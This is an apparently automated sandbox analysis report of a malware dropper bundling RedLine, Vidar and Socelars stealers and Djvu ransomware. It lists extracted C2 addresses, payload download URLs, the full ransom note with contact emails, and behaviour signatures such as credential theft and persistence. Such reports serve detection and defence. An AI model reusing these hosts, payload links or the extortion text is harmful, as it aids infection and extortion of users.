Resubmissions
28-03-2022 07:58
220328-jty77adcdp 1025-03-2022 09:29
220325-lf232adhh3 125-03-2022 09:16
220325-k8tfxsaddl 1024-03-2022 20:10
220324-yx6trsdgg5 121-03-2022 09:00
220321-kyfgbaafh9 1021-03-2022 08:57
220321-kw1dpsafg5 420-03-2022 10:09
220320-l64pjscaen 1019-03-2022 11:38
220319-nr4gcaghhr 10Analysis
-
max time kernel
1802s -
max time network
1767s -
platform
windows10_x64 -
resource
win10-20220223-ja -
submitted
19-03-2022 11:38
Static task
static1
Behavioral task
behavioral1
Sample
setup_x86_x64_install.exe
Resource
win10-20220223-ja
General
-
Target
setup_x86_x64_install.exe
-
Size
6.2MB
-
MD5
d2f0cfac1c354f041c7b243f3df94d0a
-
SHA1
dfc03d06e799018485dc2dd72f997a0fef3d83a1
-
SHA256
3faadb2356253a3c76b42691c13dd3c05b0df75fbf543041bd7afc478b9a838c
-
SHA512
ed4b434001a16e0d81d59a5be9a26d31be8fb518ddc9e98dd22ca031761ab88ec9d4d479f11b2c0febfb90960061159836c806952d9e0c5cf9239654a5b7e6d6
Malware Config
Extracted
socelars
http://www.iyiqian.com/
http://www.xxhufdc.top/
http://www.uefhkice.xyz/
http://www.fcektsy.top/
Extracted
redline
ANI
45.142.215.47:27643
Extracted
djvu
http://fuyt.org/test3/get.php
-
extension
.xcbg
-
offline_id
y6oQcfhmSRc7ZQ1q8yjLE3LhY8kK7FHg6LLlEht1
-
payload_url
http://zerit.top/dl/build2.exe
http://fuyt.org/files/1/build3.exe
-
ransomnote
ATTENTION! Don't worry, you can return all your files! All your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key. The only method of recovering files is to purchase decrypt tool and unique key for you. This software will decrypt all your encrypted files. What guarantees you have? You can send one of your encrypted file from your PC and we decrypt it for free. But we can decrypt only 1 file for free. File must not contain valuable information. You can get and look video overview decrypt tool: https://we.tl/t-zHDj26n4NW Price of private key and decrypt software is $980. Discount 50% available if you contact us first 72 hours, that's price for you is $490. Please note that you'll never restore your data without payment. Check your e-mail "Spam" or "Junk" folder if you don't get answer more than 6 hours. To get this software you need write on our e-mail: support@sysmail.ch Reserve e-mail address to contact us: supportsys@airmail.cc Your personal ID: 0417Jsfkjn
Extracted
redline
RUZKI
193.233.48.58:38989
-
auth_value
7787ecc647f66a171613d91bd46a7ce7
Extracted
vidar
40.6
706
https://dimonbk83.tumblr.com/
-
profile_id
706
Extracted
redline
nam22
103.133.111.182:44839
-
auth_value
3f8eb78d92dc3090929f5d0a3202a25f
Signatures
-
Detected Djvu ransomware 4 IoCs
Processes:
resource yara_rule behavioral1/memory/4384-477-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/3196-478-0x0000000002240000-0x000000000235B000-memory.dmp family_djvu behavioral1/memory/4384-479-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu behavioral1/memory/4384-480-0x0000000000400000-0x0000000000537000-memory.dmp family_djvu -
Djvu Ransomware
Ransomware which is a variant of the STOP family.
-
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 14 IoCs
Processes:
resource yara_rule behavioral1/memory/2280-203-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral1/memory/3436-470-0x00000000013D0000-0x000000000154C000-memory.dmp family_redline behavioral1/memory/3224-476-0x0000000002180000-0x00000000021B4000-memory.dmp family_redline behavioral1/memory/3224-483-0x00000000024B0000-0x00000000024E2000-memory.dmp family_redline behavioral1/memory/3436-482-0x00000000013D0000-0x000000000154C000-memory.dmp family_redline behavioral1/memory/3436-492-0x00000000013D0000-0x000000000154C000-memory.dmp family_redline behavioral1/memory/4480-485-0x0000000000060000-0x0000000000279000-memory.dmp family_redline behavioral1/memory/4448-490-0x0000000000AB0000-0x0000000000C2E000-memory.dmp family_redline behavioral1/memory/4436-489-0x00000000012E0000-0x000000000147A000-memory.dmp family_redline behavioral1/memory/4448-507-0x0000000000AB0000-0x0000000000C2E000-memory.dmp family_redline behavioral1/memory/4448-519-0x0000000000AB0000-0x0000000000C2E000-memory.dmp family_redline behavioral1/memory/4436-516-0x00000000012E0000-0x000000000147A000-memory.dmp family_redline behavioral1/memory/4480-511-0x0000000000060000-0x0000000000279000-memory.dmp family_redline behavioral1/memory/4924-538-0x0000000000400000-0x0000000000420000-memory.dmp family_redline -
Socelars Payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02dc626f48.exe family_socelars C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue02dc626f48.exe family_socelars -
suricata: ET MALWARE GCleaner Downloader Activity M5
suricata: ET MALWARE GCleaner Downloader Activity M5
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt) M2
-
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (passwords.txt) M2
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
suricata: ET MALWARE Vidar/Arkei Stealer Client Data Upload
-
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer HTTP POST Pattern
-
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
suricata: ET MALWARE Win32/Spy.Socelars.S CnC Activity M3
-
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
suricata: ET MALWARE Win32/Unk.HRESQ! MultiDownloader Checkin M2
-
Vidar Stealer 2 IoCs
Processes:
resource yara_rule behavioral1/memory/672-491-0x0000000003530000-0x0000000003604000-memory.dmp family_vidar behavioral1/memory/672-514-0x0000000000400000-0x00000000017ED000-memory.dmp family_vidar -
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libcurlpp.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libcurlpp.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libcurl.dll aspack_v212_v242 C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libstdc++-6.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libcurl.dll aspack_v212_v242 \Users\Admin\AppData\Local\Temp\7zS0EA7B97D\libstdc++-6.dll aspack_v212_v242 -
Blocklisted process makes network request 1 IoCs
Processes:
rundll32.exeflow pid process 430 4548 rundll32.exe -
Downloads MZ/PE file
-
Executes dropped EXE 54 IoCs
Processes:
setup_installer.exesetup_install.exeTue026e94a5005f8.exeTue029560e6534e190c.exeTue02dc626f48.exeTue02522f9ea0b1.exeTue028a363eda.exeTue02b2110095fe706.exeTue026e182673.exeTue02520f255d0ba43a.exeTue02976fcdf1.exeTue02705f9c2b455.exeTue0289c99651.exeTue02b2110095fe706.tmpTue026e94a5005f8.execehsfcsC_6Vh88t0LaZcKPANlvk2QsC.exel9zT5gMhbrL80GwRZ9UBShd6.exePSCakx_1GqG6H8j49kLJjf_H.exeFmI4giCCPSrfnMxkXeAZH6dK.exeGr4SP6wxzr4cmONkSIJAPieO.exeXJ0fkTUF_30pQ1pVSKd3oMyu.exe1gVwz1kmsntO2R5yrGr_FczL.exeYXeE4i59D2lxgKdXKkqS0Fxk.exeteJ9sS7uHYXx1OcqqRMSjW7B.exeWydn3mlENByJVR0hON7G5aEk.exeKM1GP8eBX6tE73klGEMH4jeJ.exe6QulEKJrycYYo69tD2ahPE3n.exe1gVwz1kmsntO2R5yrGr_FczL.exev9TVPfVJzB8QNFTNNg1v1AXM.exeIuB9lXIpkiGXkx4KjSXWaIxx.exeDujwSDGj6rBy6VBkaH4v2_l5.exerEDoQSnoRad92QLv2nJZu2Q3.exe_QgXA65A1rFOh_D_z2nP51AX.exejsO7dL6oWz2DHLgBjIAv4UFJ.exeFXmWnCZXXUM_ZK6RVocu5tD2.exeConhost.exexYSE4t1bAahNsp7m6Yi1zXDI.exeuHk61GN7Gby0LzvBe2zXGGJL.exe4GH1eUKzRccr8EdKp64_qmk6.exeS0mjV8kxlJkIt5WHSdw4FyQw.exeInstall.exeuHk61GN7Gby0LzvBe2zXGGJL.exeSTY8hL6xDlOSsr4U3ZdGscfw.exeInstall.exeSta.exe.pifRkeagtomax1.exebmQJtyn.exe32A.exedJtxzFN.exe32A.execehsfcsirhsfcsirhsfcspid process 2784 setup_installer.exe 4056 setup_install.exe 608 Tue026e94a5005f8.exe 672 Tue029560e6534e190c.exe 996 Tue02dc626f48.exe 384 Tue02522f9ea0b1.exe 1180 Tue028a363eda.exe 1960 Tue02b2110095fe706.exe 2880 Tue026e182673.exe 3424 Tue02520f255d0ba43a.exe 3772 Tue02976fcdf1.exe 3724 Tue02705f9c2b455.exe 1260 Tue0289c99651.exe 212 Tue02b2110095fe706.tmp 2280 Tue026e94a5005f8.exe 4016 cehsfcs 712 C_6Vh88t0LaZcKPANlvk2QsC.exe 3464 l9zT5gMhbrL80GwRZ9UBShd6.exe 2888 PSCakx_1GqG6H8j49kLJjf_H.exe 532 FmI4giCCPSrfnMxkXeAZH6dK.exe 1844 Gr4SP6wxzr4cmONkSIJAPieO.exe 3224 XJ0fkTUF_30pQ1pVSKd3oMyu.exe 3196 1gVwz1kmsntO2R5yrGr_FczL.exe 3880 YXeE4i59D2lxgKdXKkqS0Fxk.exe 540 teJ9sS7uHYXx1OcqqRMSjW7B.exe 3436 Wydn3mlENByJVR0hON7G5aEk.exe 2988 KM1GP8eBX6tE73klGEMH4jeJ.exe 4124 6QulEKJrycYYo69tD2ahPE3n.exe 4384 1gVwz1kmsntO2R5yrGr_FczL.exe 4428 v9TVPfVJzB8QNFTNNg1v1AXM.exe 4436 IuB9lXIpkiGXkx4KjSXWaIxx.exe 4448 DujwSDGj6rBy6VBkaH4v2_l5.exe 4456 rEDoQSnoRad92QLv2nJZu2Q3.exe 4464 _QgXA65A1rFOh_D_z2nP51AX.exe 4472 jsO7dL6oWz2DHLgBjIAv4UFJ.exe 4480 FXmWnCZXXUM_ZK6RVocu5tD2.exe 4488 Conhost.exe 4496 xYSE4t1bAahNsp7m6Yi1zXDI.exe 4504 uHk61GN7Gby0LzvBe2zXGGJL.exe 4512 4GH1eUKzRccr8EdKp64_qmk6.exe 4520 S0mjV8kxlJkIt5WHSdw4FyQw.exe 4084 Install.exe 4924 uHk61GN7Gby0LzvBe2zXGGJL.exe 4232 STY8hL6xDlOSsr4U3ZdGscfw.exe 4912 Install.exe 5240 Sta.exe.pif 4108 Rkeagtomax1.exe 3416 bmQJtyn.exe 4992 32A.exe 4176 dJtxzFN.exe 2484 32A.exe 4452 cehsfcs 5784 irhsfcs 5076 irhsfcs -
Modifies Installed Components in the registry 2 TTPs
-
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue0289c99651.exe vmprotect C:\Users\Admin\AppData\Local\Temp\7zS0EA7B97D\Tue0289c99651.exe vmprotect behavioral1/memory/1260-171-0x0000000140000000-0x0000000140650000-memory.dmp vmprotect -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
Processes:
rundll32.exeInstall.exedescription ioc process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe -
Checks computer location settings 2 TTPs 2 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
Tue02520f255d0ba43a.exedJtxzFN.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Control Panel\International\Geo\Nation Tue02520f255d0ba43a.exe Key value queried \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Control Panel\International\Geo\Nation dJtxzFN.exe -
Loads dropped DLL 15 IoCs
Processes:
setup_install.exeTue02b2110095fe706.tmptaskmgr.exeYXeE4i59D2lxgKdXKkqS0Fxk.exe_QgXA65A1rFOh_D_z2nP51AX.exejsO7dL6oWz2DHLgBjIAv4UFJ.exerundll32.exepid process 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 4056 setup_install.exe 212 Tue02b2110095fe706.tmp 4224 taskmgr.exe 3880 YXeE4i59D2lxgKdXKkqS0Fxk.exe 3880 YXeE4i59D2lxgKdXKkqS0Fxk.exe 4464 _QgXA65A1rFOh_D_z2nP51AX.exe 4464 _QgXA65A1rFOh_D_z2nP51AX.exe 4472 jsO7dL6oWz2DHLgBjIAv4UFJ.exe 4472 jsO7dL6oWz2DHLgBjIAv4UFJ.exe 4548 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
explorer.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe Key opened \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 explorer.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 1 IoCs
Processes:
rEDoQSnoRad92QLv2nJZu2Q3.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-1937337463-1541593363-3360944660-1000\Software\Microsoft\Windows\CurrentVersion\Run\Xeceh = "\"C:\\Users\\Admin\\AppData\\Roaming\\Qanrdjgx\\Xeceh.exe\"" rEDoQSnoRad92QLv2nJZu2Q3.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Processes:
Tue02b2110095fe706.tmpGr4SP6wxzr4cmONkSIJAPieO.exedescription ioc process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Tue02b2110095fe706.tmp Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Gr4SP6wxzr4cmONkSIJAPieO.exe -
Drops Chrome extension 2 IoCs
Processes:
dJtxzFN.exedescription ioc process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json dJtxzFN.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\meejmcfbiapijdfaadackoblffmidlig\1.0.0.0\manifest.json dJtxzFN.exe -
Drops desktop.ini file(s) 1 IoCs
Processes:
dJtxzFN.exedescription ioc process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini dJtxzFN.exe -
Enumerates connected drives 3 TTPs 1 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
Processes:
explorer.exedescription ioc process File opened (read-only) \??\D: explorer.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 5 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 91 ipinfo.io 92 ipinfo.io 220 ipinfo.io 221 ipinfo.io 7 ip-api.com -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Drops file in System32 directory 35 IoCs
Processes:
dJtxzFN.exepowershell.exeInstall.exebmQJtyn.exepowershell.exerundll32.exedescription ioc process File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\42F5672C93743CEB7A490AEA00E50796 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\42F5672C93743CEB7A490AEA00E50796 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_9D8EAD474C2F772AA0EF6DA160946E46 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_86ADF94B709B143BD643BB1C6F47DD63 dJtxzFN.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B398B80134F72209547439DB21AB308D_A4CF52CCA82D7458083F7280801A3A04 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_946D9864B4F1FD10771D10327B5724D7 dJtxzFN.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache dJtxzFN.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini bmQJtyn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_9D8EAD474C2F772AA0EF6DA160946E46 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_86ADF94B709B143BD643BB1C6F47DD63 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol bmQJtyn.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_A30EA9B4E1BC5DBF09A8EF399E086D27 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_946D9864B4F1FD10771D10327B5724D7 dJtxzFN.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe -
Suspicious use of NtSetInformationThreadHideFromDebugger 6 IoCs
Processes:
Wydn3mlENByJVR0hON7G5aEk.exejsO7dL6oWz2DHLgBjIAv4UFJ.exeIuB9lXIpkiGXkx4KjSXWaIxx.exeFXmWnCZXXUM_ZK6RVocu5tD2.exe_QgXA65A1rFOh_D_z2nP51AX.exeDujwSDGj6rBy6VBkaH4v2_l5.exepid process 3436 Wydn3mlENByJVR0hON7G5aEk.exe 4472 jsO7dL6oWz2DHLgBjIAv4UFJ.exe 4436 IuB9lXIpkiGXkx4KjSXWaIxx.exe 4480 FXmWnCZXXUM_ZK6RVocu5tD2.exe 4464 _QgXA65A1rFOh_D_z2nP51AX.exe 4448 DujwSDGj6rBy6VBkaH4v2_l5.exe -
Suspicious use of SetThreadContext 5 IoCs
Processes:
WerFault.exe1gVwz1kmsntO2R5yrGr_FczL.exeuHk61GN7Gby0LzvBe2zXGGJL.exerEDoQSnoRad92QLv2nJZu2Q3.exe32A.exedescription pid process target process PID 608 set thread context of 2280 608 WerFault.exe Tue026e94a5005f8.exe PID 3196 set thread context of 4384 3196 1gVwz1kmsntO2R5yrGr_FczL.exe 1gVwz1kmsntO2R5yrGr_FczL.exe PID 4504 set thread context of 4924 4504 uHk61GN7Gby0LzvBe2zXGGJL.exe uHk61GN7Gby0LzvBe2zXGGJL.exe PID 4456 set thread context of 4196 4456 rEDoQSnoRad92QLv2nJZu2Q3.exe MSBuild.exe PID 4992 set thread context of 2484 4992 32A.exe 32A.exe -
Drops file in Program Files directory 16 IoCs
Processes:
dJtxzFN.exel9zT5gMhbrL80GwRZ9UBShd6.exedescription ioc process File created C:\Program Files (x86)\CgqbhrirU\VRLcEQ.dll dJtxzFN.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja dJtxzFN.exe File created C:\Program Files (x86)\LHKJFdwYUyvU2\OVIRNLKciEhQe.dll dJtxzFN.exe File created C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\iCWpjYs.xml dJtxzFN.exe File opened for modification C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe l9zT5gMhbrL80GwRZ9UBShd6.exe File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi dJtxzFN.exe File created C:\Program Files (x86)\LHKJFdwYUyvU2\noorhTW.xml dJtxzFN.exe File created C:\Program Files (x86)\eRTwotBbzMFkBZRkNbR\XdwpBCN.dll dJtxzFN.exe File created C:\Program Files (x86)\qSPWXtASFZsjC\dMxTSxe.dll dJtxzFN.exe File created C:\Program Files (x86)\qSPWXtASFZsjC\uRpIpgl.xml dJtxzFN.exe File created C:\Program Files (x86)\LBHdSxvSsGUn\AWUODcc.dll dJtxzFN.exe File created C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe l9zT5gMhbrL80GwRZ9UBShd6.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak dJtxzFN.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak dJtxzFN.exe File created C:\Program Files (x86)\CgqbhrirU\rJFKXdM.xml dJtxzFN.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi dJtxzFN.exe -
Drops file in Windows directory 22 IoCs
Processes:
ShellExperienceHost.exeexplorer.exeschtasks.exeSystemSettings.exetaskmgr.exeSearchUI.exeschtasks.exeschtasks.exeschtasks.exedescription ioc process File created C:\Windows\rescache\_merged\1601268389\3877292338.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\3720402701\2219095117.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\4032412167\2900507189.pri explorer.exe File created C:\Windows\Tasks\phsiVgbIVaYavuCQX.job schtasks.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri File created C:\Windows\rescache\_merged\2717123927\3950266016.pri SystemSettings.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri explorer.exe File created C:\Windows\rescache\_merged\3418783148\1077508030.pri taskmgr.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri SearchUI.exe File created C:\Windows\rescache\_merged\1601268389\3877292338.pri taskmgr.exe File created C:\Windows\Tasks\bnHoQpKIlSSCUFQrDN.job schtasks.exe File created C:\Windows\Tasks\FNmmdByUIWCoGhfBf.job schtasks.exe File created C:\Windows\Tasks\NYfziUdouSArZkj.job schtasks.exe File created C:\Windows\rescache\_merged\4183903823\810424605.pri taskmgr.exe File created C:\Windows\rescache\_merged\860799236\610465418.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\1301087654\4010849688.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\3002025025\858786317.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\3060194815\2825129510.pri SystemSettings.exe File created C:\Windows\rescache\_merged\4032412167\2900507189.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\2717123927\3950266016.pri ShellExperienceHost.exe File created C:\Windows\rescache\_merged\4272278488\3302449443.pri ShellExperienceHost.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 24 IoCs
Processes:
WerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exeWerFault.exepid pid_target process target process 2768 4056 WerFault.exe setup_install.exe 3412 2880 WerFault.exe Tue026e182673.exe 3748 2880 WerFault.exe Tue026e182673.exe 3284 2880 WerFault.exe Tue026e182673.exe 2760 672 WerFault.exe Tue029560e6534e190c.exe 3484 2880 WerFault.exe Tue026e182673.exe 528 2880 WerFault.exe Tue026e182673.exe 1952 2880 WerFault.exe Tue026e182673.exe 1460 2880 WerFault.exe Tue026e182673.exe 1644 2880 WerFault.exe Tue026e182673.exe 608 2880 WerFault.exe Tue026e182673.exe 4356 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 4808 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 4800 4384 WerFault.exe 1gVwz1kmsntO2R5yrGr_FczL.exe 4980 540 WerFault.exe teJ9sS7uHYXx1OcqqRMSjW7B.exe 1420 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 1280 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 3900 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 4240 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 200 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 5172 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 5796 532 WerFault.exe FmI4giCCPSrfnMxkXeAZH6dK.exe 4412 2880 WerFault.exe Tue026e182673.exe 5396 4452 WerFault.exe cehsfcs -
Checks SCSI registry key(s) 3 TTPs 34 IoCs
SCSI information is often read in order to detect sandboxing environments.
Processes:
